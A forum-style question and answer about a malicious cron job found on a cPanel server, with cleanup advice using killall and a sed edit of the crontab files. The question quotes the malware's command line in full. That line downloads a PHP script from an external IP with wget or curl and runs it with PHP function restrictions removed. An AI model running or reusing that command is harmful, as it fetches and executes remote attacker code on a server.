Prevent malicious execution in Cron
I use cPanel and apache.
I see this process in my server:
opt/cpanel/ea-php74/root/usr/bin/php -d disable_functions= /tmp/codeItems3
root     17549  0.0  0.0  27180   972 ?        Ss   Apr16   0:00 jailshell (amolnxxx) [17581] ll -c sleep 3; ( wget --compression=gzip -O/tmp/codeItems3 http://45.140.X.x/start.php?v=1  curl -s --compressed --max-time 30 http://45.140.X.X/start.php?v=1 > /tmp/codeItems3 ) && ( /usr/local/bin/php -d disable_functions="" /tmp/codeItems3  /usr/bin/php -d disable_functions="" /tmp/codeItems3 || php -d disable_functions="" /tmp/codeItems3 )


What is the problem? How do I stop it?

We have seen similar on our own servers, and found most of the processes were 'sh' or 'wget' requests, which are executed via a users cron.
You could do the following...
killall -9 sh wget 

Then, to remove the crontab entries for your cPanel users, run...
sed -i "/codeItem/d" /var/spool/cron/*

This should kill all of the running processes, and also will remove the crontab entries which execute them.
